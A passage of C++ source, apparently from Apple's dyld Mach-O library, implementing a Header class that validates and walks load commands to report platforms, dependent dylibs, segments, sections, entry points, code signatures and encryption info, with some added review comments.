const +{ + bool stop = false; + const load_command* startCmds = nullptr; + if ( mh.magic == MH_MAGIC_64 ) + startCmds = (load_command*)((char*)this + sizeof(mach_header_64)); + else if ( mh.magic == MH_MAGIC ) + startCmds = (load_command*)((char*)this + sizeof(mach_header)); + else if ( hasMachOBigEndianMagic() ) + return Error("big endian mach-o file"); + else { + const uint32_t* h = (uint32_t*)this; + return Error("file does not start with MH_MAGIC[_64]: 0x%08X 0x%08X", h[0], h[1]); + } + if ( mh.filetype > 12 ) + return Error("unknown mach-o filetype (%u)", mh.filetype); + // const uint32_t ptrSize = this->pointerSize(); + const load_command* const cmdsEnd = (load_command*)((char*)startCmds + mh.sizeofcmds); + const load_command* cmd = startCmds; + for ( uint32_t i = 1; (i <= mh.ncmds) && !stop; ++i ) { + const load_command* nextCmd = (load_command*)((char*)cmd + cmd->cmdsize); + if ( cmd >= cmdsEnd ) { + return Error("malformed load command (%d of %d) at %p with mh=%p, off end of load commands", i, mh.ncmds, cmd, this); + } + if ( cmd->cmdsize < 8 ) { + return Error("malformed load command (%d of %d) at %p with mh=%p, size (0x%X) too small", i, mh.ncmds, cmd, this, cmd->cmdsize); + } +#if 0 + // check the cmdsize is pointer aligned + if ( checks.pointerAlignedLoadCommands ) { + if ( (cmd->cmdsize % ptrSize) != 0 ) { + return Error("malformed load command (%d of %d) at %p with mh=%p, size (0x%X) is not pointer sized", i, mh.ncmds, cmd, this, cmd->cmdsize); + } + } +#endif + if ( (nextCmd > cmdsEnd) || (nextCmd < startCmds) ) { + return Error("malformed load command (%d of %d) at %p with mh=%p, size (0x%X) is too large, load commands end at %p", i, mh.ncmds, cmd, this, cmd->cmdsize, cmdsEnd); + } + callback(cmd, stop); + cmd = nextCmd; + } + return Error::none(); +} + +// This forEach is only used after the load commands have been validated, so no need to return Error and handle it +void Header::forEachLoadCommandSafe(void (^callback)(const load_command* cmd, 
bool& stop)) const +{ + if ( Error err = forEachLoadCommand(callback) ) + assert("Header::forEachLoadCommand()"); +} + +bool Header::hasLoadCommand(uint32_t cmdNum) const +{ + __block bool hasLC = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == cmdNum ) { + hasLC = true; + stop = true; + } + }); + return hasLC; +} + +bool Header::isStaticExecutable() const +{ + if ( mh.filetype != MH_EXECUTE ) + return false; + + // static executables do not have dyld load command + return !hasLoadCommand(LC_LOAD_DYLINKER); +} + +// +// MARK: --- methods that read Platform load commands --- +// + +void Header::forEachPlatformLoadCommand(void (^handler)(Platform platform, Version32 minOS, Version32 sdk)) const +{ + __block bool foundPlatform = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + const build_version_command* buildCmd = (build_version_command*)cmd; + const version_min_command* versCmd = (version_min_command*)cmd; + uint32_t sdk; + switch ( cmd->cmd ) { + case LC_BUILD_VERSION: + handler(Platform(buildCmd->platform), Version32(buildCmd->minos), Version32(buildCmd->sdk)); + foundPlatform = true; + break; + case LC_VERSION_MIN_MACOSX: + sdk = versCmd->sdk; + // The original LC_VERSION_MIN_MACOSX did not have an sdk field, assume sdk is same as minOS for those old binaries + if ( sdk == 0 ) + sdk = versCmd->version; + handler(Platform::macOS, Version32(versCmd->version), Version32(sdk)); + foundPlatform = true; + break; + case LC_VERSION_MIN_IPHONEOS: + if ( (mh.cputype == CPU_TYPE_X86_64) || (mh.cputype == CPU_TYPE_I386) ) + handler(Platform::iOS_simulator, Version32(versCmd->version), Version32(versCmd->sdk)); // old sim binary + else + handler(Platform::iOS, Version32(versCmd->version), Version32(versCmd->sdk)); + foundPlatform = true; + break; + case LC_VERSION_MIN_TVOS: + if ( mh.cputype == CPU_TYPE_X86_64 ) + handler(Platform::tvOS_simulator, Version32(versCmd->version), Version32(versCmd->sdk)); // 
// old sim binary
                else
                    handler(Platform::tvOS, Version32(versCmd->version), Version32(versCmd->sdk));
                foundPlatform = true;
                break;
            case LC_VERSION_MIN_WATCHOS:
                if ( (mh.cputype == CPU_TYPE_X86_64) || (mh.cputype == CPU_TYPE_I386) )
                    handler(Platform::watchOS_simulator, Version32(versCmd->version), Version32(versCmd->sdk)); // old sim binary
                else
                    handler(Platform::watchOS, Version32(versCmd->version), Version32(versCmd->sdk));
                foundPlatform = true;
                break;
        }
    });
#ifndef BUILDING_MACHO_WRITER // no implicit platforms in static linker
    if ( !foundPlatform ) {
        // old binary with no explicit platform
#if TARGET_OS_OSX
        // FIX: was bitwise '|'; logical '||' expresses the intent (same result here,
        // but '|' defeats short-circuiting and reads as a typo)
        if ( (mh.cputype == CPU_TYPE_X86_64) || (mh.cputype == CPU_TYPE_I386) )
            handler(Platform::macOS, Version32(10, 5), Version32(10, 5)); // guess it is a macOS 10.5 binary
        //
        // The Go linker emits non-standard binaries without a platform and we have to live with it.
        if ( mh.cputype == CPU_TYPE_ARM64 )
            handler(Platform::macOS, Version32(11, 0), Version32(11, 0)); // guess it is a macOS 11.0 binary
#endif
    }
#endif
}

// Returns true if the binary targets `reqPlatform` (directly, or via a zippered/
// unzipped variant unless `onlyOnePlatform` is set).
bool Header::builtForPlatform(Platform reqPlatform, bool onlyOnePlatform) const
{
    PlatformAndVersions pvs = platformAndVersions();

    if ( pvs.platform == reqPlatform )
        return true;

    if ( onlyOnePlatform )
        return false;

    __block bool match = false;
    pvs.unzip(^(PlatformAndVersions pvers) {
        match |= pvers.platform == reqPlatform;
    });

    return match;
}

bool Header::isZippered() const
{
    return platformAndVersions().platform == Platform::zippered;
}

// True if the binary opted in to running on an alternate platform via a
// __DATA*,__allow_alt_plat section.
bool Header::allowsAlternatePlatform() const
{
    __block bool result = false;
    this->forEachSection(^(const SectionInfo& info, bool& stop) {
        if ( (info.sectionName == "__allow_alt_plat") && info.segmentName.starts_with("__DATA") ) {
            result = true;
            stop = true;
        }
    });
    return result;
}

// Returns the LC_ID_DYLIB install name, or nullptr if there is none.
const char* Header::installName() const
{
    const char* name;
    Version32 compatVersion;
    Version32 currentVersion;
    // FIX: repaired mojibake "¤tVersion" (HTML-entity damage of "&currentVersion")
    if ( getDylibInstallName(&name, &compatVersion, &currentVersion) )
        return name;
    return nullptr;
}

// Extracts install name and versions from LC_ID_DYLIB; returns false when the
// binary has no LC_ID_DYLIB (out-params untouched in that case).
bool Header::getDylibInstallName(const char** installName, Version32* compatVersion, Version32* currentVersion) const
{
    __block bool found = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_ID_DYLIB ) {
            const dylib_command* dylibCmd = (dylib_command*)cmd;
            *compatVersion = Version32(dylibCmd->dylib.compatibility_version);
            *currentVersion = Version32(dylibCmd->dylib.current_version);
            *installName = (char*)dylibCmd + dylibCmd->dylib.name.offset;
            found = true;
            stop = true;
        }
    });
    return found;
}

// Copies the LC_UUID value into `uuid`; zero-fills it and returns false if absent.
bool Header::getUuid(uuid_t uuid) const
{
    __block bool found = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_UUID ) {
            const uuid_command* uc = (const uuid_command*)cmd;
            memcpy(uuid, uc->uuid, sizeof(uuid_t));
            found = true;
            stop = true;
        }
    });
    if ( !found )
        bzero(uuid, sizeof(uuid_t));
    return found;
}


// Returns the load path of the depIndex'th dependent dylib (counting all four
// LC_LOAD_*_DYLIB/LC_REEXPORT_DYLIB kinds in load command order), or nullptr.
const char* Header::dependentDylibLoadPath(uint32_t depIndex) const
{
    __block uint32_t curIndex = 0;
    __block const char* result = nullptr;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        switch ( cmd->cmd ) {
            case LC_LOAD_DYLIB:
            case LC_LOAD_WEAK_DYLIB:
            case LC_REEXPORT_DYLIB:
            case LC_LOAD_UPWARD_DYLIB: {
                const dylib_command* dylibCmd = (dylib_command*)cmd;
                if ( curIndex == depIndex )
                    result = (char*)dylibCmd + dylibCmd->dylib.name.offset;
                ++curIndex;
            } break;
        }
    });
    return result;
}

// Counts dependent dylib load commands; optionally reports whether all of them
// are plain LC_LOAD_DYLIB linkages.
uint32_t Header::dependentDylibCount(bool* allDepsAreNormal) const
{
    if ( allDepsAreNormal != nullptr )
        *allDepsAreNormal = true;
    __block unsigned count = 0;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        switch ( cmd->cmd ) {
            case LC_LOAD_WEAK_DYLIB:
            case LC_REEXPORT_DYLIB:
            case LC_LOAD_UPWARD_DYLIB:
                if ( allDepsAreNormal != nullptr )
                    *allDepsAreNormal = false; // record if any
// linkages were weak, re-export, or upward
                ++count;
                break;
            case LC_LOAD_DYLIB:
                ++count;
                break;
        }
    });
    return count;
}

// Calls `callback` for every dependent dylib load command. If the binary links
// with nothing, a synthetic libSystem dependency is reported (everything must
// link with something), except for the libSystem sub-dylibs themselves.
void Header::forEachDependentDylib(void (^callback)(const char* loadPath, bool isWeak, bool isReExport, bool isUpward,
                                                    Version32 compatVersion, Version32 curVersion, bool& stop)) const
{
    __block unsigned count = 0;
    __block bool stopped = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        switch ( cmd->cmd ) {
            case LC_LOAD_DYLIB:
            case LC_LOAD_WEAK_DYLIB:
            case LC_REEXPORT_DYLIB:
            case LC_LOAD_UPWARD_DYLIB: {
                const dylib_command* dylibCmd = (dylib_command*)cmd;
                const char* loadPath = (char*)dylibCmd + dylibCmd->dylib.name.offset;
                callback(loadPath, (cmd->cmd == LC_LOAD_WEAK_DYLIB), (cmd->cmd == LC_REEXPORT_DYLIB), (cmd->cmd == LC_LOAD_UPWARD_DYLIB),
                         Version32(dylibCmd->dylib.compatibility_version), Version32(dylibCmd->dylib.current_version), stop);
                ++count;
                if ( stop )
                    stopped = true;
            } break;
        }
    });
    // everything must link with something
    if ( (count == 0) && !stopped ) {
        // The dylibs that make up libSystem can link with nothing
        // except for dylibs in libSystem.dylib which are ok to link with nothing (they are on bottom)
        // NOTE(review): installName() can return nullptr for a dylib with no
        // LC_ID_DYLIB, which strncmp() would not tolerate — confirm callers
        // only reach here with well-formed dylibs
        if ( this->builtForPlatform(Platform::driverKit, true) ) {
            if ( !this->isDylib() || (strncmp(this->installName(), "/System/DriverKit/usr/lib/system/", 33) != 0) )
                callback("/System/DriverKit/usr/lib/libSystem.B.dylib", false, false, false, Version32(1, 0), Version32(1, 0), stopped);
        }
        else {
            if ( !this->isDylib() || (strncmp(this->installName(), "/usr/lib/system/", 16) != 0) )
                callback("/usr/lib/libSystem.B.dylib", false, false, false, Version32(1, 0), Version32(1, 0), stopped);
        }
    }
}

// Reports each LC_DYLD_ENVIRONMENT "KEY=value" string whose key starts with
// DYLD_ and ends with _PATH (the only variables dyld honors from binaries).
void Header::forDyldEnv(void (^callback)(const char* envVar, bool& stop)) const
{
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_DYLD_ENVIRONMENT ) {
            const dylinker_command* envCmd = (dylinker_command*)cmd;
            const char* keyEqualsValue = (char*)envCmd + envCmd->name.offset;
            // only process variables that start with DYLD_ and end in _PATH
            if ( (strncmp(keyEqualsValue, "DYLD_", 5) == 0) ) {
                const char* equals = strchr(keyEqualsValue, '=');
                if ( equals != NULL ) {
                    // equals[-5] is safe: the "DYLD_" prefix guarantees '=' is at index >= 5
                    if ( strncmp(&equals[-5], "_PATH", 5) == 0 ) {
                        callback(keyEqualsValue, stop);
                    }
                }
            }
        }
    });
}

// Extracts the initial PC from an LC_UNIXTHREAD register blob. The register
// file starts 16 bytes into the command; the flavor word is at offset 8.
// Register indices below select the PC slot for each thread-state flavor.
bool Header::entryAddrFromThreadCmd(const thread_command* cmd, uint64_t& addr) const
{
    const uint32_t* regs32 = (uint32_t*)(((char*)cmd) + 16);
    const uint64_t* regs64 = (uint64_t*)(((char*)cmd) + 16);
    uint32_t flavor = *((uint32_t*)(((char*)cmd) + 8));
    switch ( mh.cputype ) {
        case CPU_TYPE_I386:
            if ( flavor == 1 ) { // i386_THREAD_STATE
                addr = regs32[10]; // i386_thread_state_t.eip
                return true;
            }
            break;
        case CPU_TYPE_X86_64:
            if ( flavor == 4 ) { // x86_THREAD_STATE64
                addr = regs64[16]; // x86_thread_state64_t.rip
                return true;
            }
            break;
        case CPU_TYPE_ARM:
            if ( flavor == 1 ) { // ARM_THREAD_STATE
                addr = regs32[15]; // arm_thread_state_t.pc
                return true;
            }
            break;
        case CPU_TYPE_ARM64:
            if ( flavor == 6 ) { // ARM_THREAD_STATE64
                addr = regs64[32]; // arm_thread_state64_t.__pc
                return true;
            }
            break;
    }
    // NOTE(review): cmdsize is not validated against the expected register
    // count before indexing — assumed already checked by load command validation
    return false;
}

// returns false if entry point not found
// On success `offset` is the entry's file offset from the mach_header and
// `usesCRT` says whether it is an old-style LC_UNIXTHREAD entry (crt start).
bool Header::getEntry(uint64_t& offset, bool& usesCRT) const
{
    __block bool result = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_MAIN ) {
            entry_point_command* mainCmd = (entry_point_command*)cmd;
            offset = mainCmd->entryoff;
            usesCRT = false;
            result = true;
            stop = true;
        }
        else if ( cmd->cmd == LC_UNIXTHREAD ) {
            uint64_t startAddress;
            if ( entryAddrFromThreadCmd((thread_command*)cmd, startAddress) ) {
                // LC_UNIXTHREAD stores a vmaddr; convert to an offset from the header
                offset = startAddress - preferredLoadAddress();
                usesCRT = true;
                result = true;
            }
            stop = true;
        }
    });
    return result;
}

bool Header::hasCodeSignature(uint32_t& fileOffset, uint32_t& size) const
{
    __block bool result = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_CODE_SIGNATURE ) {
            linkedit_data_command* sigCmd = (linkedit_data_command*)cmd;
            fileOffset = sigCmd->dataoff;
            size = sigCmd->datasize;
            result = true;
            stop = true;
        }
    });
    // FIXME: may need to ignore codesigs from pre 10.9 macOS binaries
    return result;
}

// Returns the file offset and entry count of the indirect symbol table from
// LC_DYSYMTAB; false if the command is absent.
bool Header::hasIndirectSymbolTable(uint32_t& fileOffset, uint32_t& count) const
{
    __block bool result = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_DYSYMTAB) {
            dysymtab_command* dySymCmd = (dysymtab_command*)cmd;
            fileOffset = dySymCmd->indirectsymoff;
            count = dySymCmd->nindirectsyms;
            result = true;
            stop = true;
        }
    });
    return result;
}

// True if the binary carries split-seg info (LC_SEGMENT_SPLIT_INFO).
bool Header::hasSplitSegInfo() const
{
    __block bool result = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_SEGMENT_SPLIT_INFO) {
            result = true;
            stop = true;
        }
    });
    return result;
}

// Returns the file offset and size of the LC_ATOM_INFO payload; false if absent.
bool Header::hasAtomInfo(uint32_t& fileOffset, uint32_t& size) const
{
    __block bool result = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_ATOM_INFO) {
            linkedit_data_command* sigCmd = (linkedit_data_command*)cmd;
            fileOffset = sigCmd->dataoff;
            size = sigCmd->datasize;
            result = true;
            stop = true;
        }
    });
    return result;
}


// Counts LC_SEGMENT/LC_SEGMENT_64 load commands.
uint32_t Header::segmentCount() const
{
    __block uint32_t count = 0;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        switch ( cmd->cmd ) {
            case LC_SEGMENT:
            case LC_SEGMENT_64:
                ++count;
                break;
        }
    });
    return count;
}

// Returns the __TEXT segment's vmaddr (the address the binary was linked to
// load at), or 0 if there is no __TEXT segment.
uint64_t Header::preferredLoadAddress() const
{
    __block uint64_t textVmAddr = 0;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_SEGMENT_64 ) {
            const segment_command_64* segCmd = (segment_command_64*)cmd;
            if ( strcmp(segCmd->segname, "__TEXT") == 0 ) {
                textVmAddr = segCmd->vmaddr;
                stop = true;
            }
        }
        else if ( cmd->cmd == LC_SEGMENT ) {
            const segment_command* segCmd = (segment_command*)cmd;
            if ( strcmp(segCmd->segname, "__TEXT") == 0 ) {
                textVmAddr = segCmd->vmaddr;
                stop = true;
            }
        }
    });
    return textVmAddr;
}

// ASLR slide: where this header actually is minus where it was linked to be.
// NOTE(review): the (long) casts assume long is pointer-width (true on LP64
// Apple platforms; not on LLP64).
int64_t Header::getSlide() const
{
    return (long)this - (long)(this->preferredLoadAddress());
}

// True if any segment is marked SG_READ_ONLY (e.g. __DATA_CONST made
// read-only after fixups).
bool Header::hasDataConst() const
{
    __block bool result = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_SEGMENT_64 ) {
            const segment_command_64* segCmd = (segment_command_64*)cmd;
            if ( (segCmd->flags & SG_READ_ONLY) != 0 )
                result = true;
        }
        else if ( cmd->cmd == LC_SEGMENT ) {
            const segment_command* segCmd = (segment_command*)cmd;
            if ( (segCmd->flags & SG_READ_ONLY) != 0 )
                result = true;
        }
    });
    return result;
}

// Returns the name of the segIndex'th segment (load command order), or an
// empty string_view if segIndex is out of range.
std::string_view Header::segmentName(uint32_t segIndex) const
{
    __block std::string_view result;
    __block uint32_t segCount = 0;
    this->forEachSegment(^(const SegmentInfo& info, bool& stop) {
        if ( segIndex == segCount ) {
            result = info.segmentName;
            stop = true;
        }
        ++segCount;
    });
    return result;
}

// LC_SEGMENT stores names as char[16] potentially without a null terminator.
This returns a string_view for the given name +static std::string_view name16(const char name[16]) +{ + size_t length = strnlen(name, 16); + return std::string_view(name, length); +} + +void Header::forEachSegment(void (^callback)(const SegmentInfo& infos, bool& stop)) const +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + SegmentInfo segInfo { .segmentName=name16(segCmd->segname), .vmaddr=segCmd->vmaddr, .vmsize=segCmd->vmsize, + .fileOffset=(uint32_t)segCmd->fileoff, .fileSize=(uint32_t)segCmd->filesize, .flags=segCmd->flags, .perms=(uint8_t)segCmd->initprot }; + callback(segInfo, stop); + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + SegmentInfo segInfo { .segmentName=name16(segCmd->segname), .vmaddr=segCmd->vmaddr, .vmsize=segCmd->vmsize, + .fileOffset=segCmd->fileoff, .fileSize=segCmd->filesize, .flags=segCmd->flags, .perms=(uint8_t)segCmd->initprot }; + callback(segInfo, stop); + } + }); +} + +void Header::forEachSection(void (^callback)(const SectionInfo&, bool& stop)) const +{ + __block uint64_t prefLoadAddr = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + if ( strcmp(segCmd->segname, "__TEXT") == 0 ) + prefLoadAddr = segCmd->vmaddr; + const section_64* const sectionsStart = (section_64*)((char*)segCmd + sizeof(struct segment_command_64)); + const section_64* const sectionsEnd = §ionsStart[segCmd->nsects]; + + for ( const section_64* sect = sectionsStart; !stop && (sect < sectionsEnd); ++sect ) { + std::string_view sectName = name16(sect->sectname); + std::string_view segName = name16(sect->segname); + SectionInfo info = { segName, sectName, (uint32_t)segCmd->initprot, sect->flags, sect->align, sect->addr - prefLoadAddr, sect->size, sect->offset, + sect->reloff, 
sect->nreloc, sect->reserved1, sect->reserved2}; + callback(info, stop); + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + if ( strcmp(segCmd->segname, "__TEXT") == 0 ) + prefLoadAddr = segCmd->vmaddr; + const section* const sectionsStart = (section*)((char*)segCmd + sizeof(struct segment_command)); + const section* const sectionsEnd = §ionsStart[segCmd->nsects]; + for ( const section* sect = sectionsStart; !stop && (sect < sectionsEnd); ++sect ) { + std::string_view sectName = name16(sect->sectname); + std::string_view segName = name16(sect->segname); + SectionInfo info = { segName, sectName, (uint32_t)segCmd->initprot, sect->flags, sect->align, sect->addr - prefLoadAddr, sect->size, sect->offset, + sect->reloff, sect->nreloc, sect->reserved1, sect->reserved2}; + callback(info, stop); + } + } + }); +} + +// add any LINKEDIT content file-offset in load commands to this to get content +const uint8_t* Header::computeLinkEditBias(bool zeroFillExpanded) const +{ + // When there is no zerofill expansion, just add fileoffset of LINKEDIT content to mach_header to get content + // If there is zerofill expansion, then zerofillExpansionAmount() needs to be added in too + if ( zeroFillExpanded ) + return (uint8_t*)this + zerofillExpansionAmount(); + else + return (uint8_t*)this; +} + +// When loaded by dyld, LINKEDIT is farther from mach_header than in file +bool Header::hasZerofillExpansion() const +{ + return (zerofillExpansionAmount() != 0); +} + +uint64_t Header::zerofillExpansionAmount() const +{ + // need to find LINKEDIT and TEXT to compute difference of file offsets vs vm offsets + __block uint64_t result = 0; + __block uint64_t textVmAddr = 0; + __block uint64_t textFileOffset = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + if ( strcmp(segCmd->segname, "__TEXT") == 0 ) { + textVmAddr = 
segCmd->vmaddr;
                textFileOffset = segCmd->fileoff;
            }
            else if ( strcmp(segCmd->segname, "__LINKEDIT") == 0 ) {
                uint64_t vmOffsetToLinkedit = segCmd->vmaddr - textVmAddr;
                // NOTE(review): unlike the LC_SEGMENT branch below, textFileOffset
                // is NOT subtracted here — harmless when __TEXT fileoff is 0, but
                // confirm the asymmetry against the upstream dyld sources
                uint64_t fileOffsetToLinkedit = segCmd->fileoff;
                result = vmOffsetToLinkedit - fileOffsetToLinkedit;
                stop = true;
            }
        }
        else if ( cmd->cmd == LC_SEGMENT ) {
            const segment_command* segCmd = (segment_command*)cmd;
            if ( strcmp(segCmd->segname, "__TEXT") == 0 ) {
                textVmAddr = segCmd->vmaddr;
                textFileOffset = segCmd->fileoff;
            }
            else if ( strcmp(segCmd->segname, "__LINKEDIT") == 0 ) {
                uint64_t vmOffsetToLinkedit = segCmd->vmaddr - textVmAddr;
                uint64_t fileOffsetToLinkedit = segCmd->fileoff - textFileOffset;
                result = vmOffsetToLinkedit - fileOffsetToLinkedit;
                stop = true;
            }
        }
    });
    return result;
}

// Returns the LC_MAIN stacksize field; false if there is no LC_MAIN.
bool Header::hasCustomStackSize(uint64_t& size) const {
    __block bool result = false;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( cmd->cmd == LC_MAIN ) {
            const entry_point_command* entryPointCmd = (entry_point_command*)cmd;
            size = entryPointCmd->stacksize;
            result = true;
            stop = true;
        }
    });
    return result;
}

// True if the binary has a __RESTRICT,__restrict section (opts out of
// DYLD_* environment processing).
bool Header::isRestricted() const
{
    __block bool result = false;
    this->forEachSection(^(const SectionInfo& info, bool& stop) {
        if ( (info.segmentName == "__RESTRICT") && (info.sectionName == "__restrict") ) {
            result = true;
            stop = true;
        }
    });
    return result;
}

// True if the binary contains interposing tuples, either via the
// S_INTERPOSING section type or a __DATA*/__AUTH* "__interpose" section.
bool Header::hasInterposingTuples() const
{
    __block bool hasInterposing = false;
    this->forEachSection(^(const SectionInfo& info, bool& stop) {
        if ( ((info.flags & SECTION_TYPE) == S_INTERPOSING) || ((info.sectionName == "__interpose") && (info.segmentName.starts_with("__DATA") || info.segmentName.starts_with("__AUTH"))) ) {
            hasInterposing = true;
            stop = true;
        }
    });
    return hasInterposing;
}

// True if the binary contains an ObjC image-info section.
bool Header::hasObjC() const
{
    __block bool hasObjCInfo = false;
    this->forEachSection(^(const SectionInfo& info, bool& stop) {
        if ( (info.sectionName == "__objc_imageinfo") && info.segmentName.starts_with("__DATA") ) {
            hasObjCInfo = true;
            stop = true;
        }
    });
    return hasObjCInfo;
}

// Returns the FairPlay encryption range and cryptid; on false, textOffset
// and size are zeroed (cryptId is left untouched).
bool Header::hasEncryptionInfo(uint32_t& cryptId, uint32_t& textOffset, uint32_t& size) const
{
    if ( const encryption_info_command* encCmd = findFairPlayEncryptionLoadCommand() ) {
        cryptId = encCmd->cryptid;
        textOffset = encCmd->cryptoff;
        size = encCmd->cryptsize;
        return true;
    }
    textOffset = 0;
    size = 0;
    return false;
}

bool Header::isFairPlayEncrypted(uint32_t& textOffset, uint32_t& size) const
{
    // Note: cryptid is 0 in just-built apps. The AppStore sets cryptid to 1
    uint32_t cryptId = 0;
    return hasEncryptionInfo(cryptId, textOffset, size) && cryptId == 1;
}

// True if the binary has an encryption-info command at all (encrypted or not).
bool Header::canBeFairPlayEncrypted() const
{
    return (findFairPlayEncryptionLoadCommand() != nullptr);
}

// Finds LC_ENCRYPTION_INFO or LC_ENCRYPTION_INFO_64; nullptr if absent.
const encryption_info_command* Header::findFairPlayEncryptionLoadCommand() const
{
    __block const encryption_info_command* result = nullptr;
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if ( (cmd->cmd == LC_ENCRYPTION_INFO) || (cmd->cmd == LC_ENCRYPTION_INFO_64) ) {
            result = (encryption_info_command*)cmd;
            stop = true;
        }
    });
    return result;
}

bool Header::hasChainedFixups() const
{
    // arm64e always uses chained fixups
    if ( Architecture(&mh) == Architecture::arm64e ) {
        // Not all binaries have fixups at all so check for the load commands
        return hasLoadCommand(LC_DYLD_INFO_ONLY) || hasLoadCommand(LC_DYLD_CHAINED_FIXUPS);
    }
    return hasLoadCommand(LC_DYLD_CHAINED_FIXUPS);
}

bool Header::hasChainedFixupsLoadCommand() const
{
    return hasLoadCommand(LC_DYLD_CHAINED_FIXUPS);
}

// True if the binary uses old-style opcode-based bind/rebase info.
bool Header::hasOpcodeFixups() const
{
    return hasLoadCommand(LC_DYLD_INFO_ONLY) || hasLoadCommand(LC_DYLD_INFO);
}

// Calls `callback` for every LC_RPATH string, in load command order.
void Header::forEachRPath(void (^callback)(const char* rPath, bool& stop)) const
{
    forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) {
        if (
cmd->cmd == LC_RPATH ) { + const char* rpath = (char*)cmd + ((struct rpath_command*)cmd)->path.offset; + callback(rpath, stop); + } + }); +} + +void Header::forEachLinkerOption(void (^callback)(const char* opt, bool& stop)) const +{ + forEachLoadCommandSafe(^(const load_command *cmd, bool &stop) { + if ( cmd->cmd == LC_LINKER_OPTION ) { + const char* begin = (char*)cmd + sizeof(linker_option_command); + const uint32_t count = ((linker_option_command*)cmd)->count; + for ( uint32_t i = 0; i < count; ++i ) { + const char* next = begin + strlen(begin) + 1; + callback(begin, stop); + begin = next; + } + } + }); +} + +void Header::forAllowableClient(void (^callback)(const char* clientName, bool& stop)) const +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SUB_CLIENT ) { + const char* clientName = (char*)cmd + ((struct sub_client_command*)cmd)->client.offset; + callback(clientName, stop); + } + }); +} + +const char* Header::umbrellaName() const +{ + __block const char* result = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SUB_FRAMEWORK ) { + result = (char*)cmd + ((struct sub_framework_command*)cmd)->umbrella.offset; + } + }); + return result; +} + + +uint32_t Header::headerAndLoadCommandsSize() const +{ + return machHeaderSize() + mh.sizeofcmds; +} + +uint32_t Header::fileSize() const +{ + if ( isObjectFile() ) { + // .o files do not have LINKEDIT segment, so use end of symbol table as file size + __block uint32_t size = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SYMTAB ) { + const symtab_command* symTab = (symtab_command*)cmd; + size = symTab->stroff + symTab->strsize; + stop = true; + } + }); + return size; + } + + // compute file size from LINKEDIT fileoffset + filesize + __block uint32_t lastSegmentOffset = 0; + __block uint32_t lastSegmentSize = 0; + forEachSegment(^(const SegmentInfo &infos, bool &stop) { + if ( 
infos.fileOffset >= lastSegmentOffset ) { + lastSegmentOffset = infos.fileOffset; + lastSegmentSize = std::max(infos.fileSize, lastSegmentSize); + } + }); + if ( lastSegmentSize == 0 ) + return headerAndLoadCommandsSize(); + + uint32_t size; + if ( __builtin_add_overflow(lastSegmentOffset, lastSegmentSize, &size) + || size < headerAndLoadCommandsSize() ) + assert("malformed mach-o, size smaller than header and load commands"); + + return size; +} + +// +// MARK: --- methods that create and modify --- +// + +#if BUILDING_MACHO_WRITER + +Header* Header::make(std::span buffer, uint32_t filetype, uint32_t flags, Architecture arch, bool addImplicitTextSegment) +{ + const size_t minHeaderAlignment = filetype == MH_OBJECT ? 8 : getpagesize(); + assert(((uint64_t)buffer.data() & (minHeaderAlignment - 1)) == 0); + assert(buffer.size() >= sizeof(mach_header_64)); + bzero(buffer.data(), buffer.size()); + Header& header = *(Header*)buffer.data(); + mach_header& mh = header.mh; + if ( arch.isBigEndian() ) { + mh.magic = arch.is64() ? MH_CIGAM_64 : MH_CIGAM; + mh.filetype = OSSwapBigToHostInt32(filetype); + mh.ncmds = 0; + mh.sizeofcmds = OSSwapBigToHostInt32(MH_NOUNDEFS | MH_DYLDLINK | MH_TWOLEVEL); + mh.flags = OSSwapBigToHostInt32(flags); + arch.set(mh); + return &header; // can only construct mach_header for big-endian + } + else { + mh.magic = arch.is64() ? 
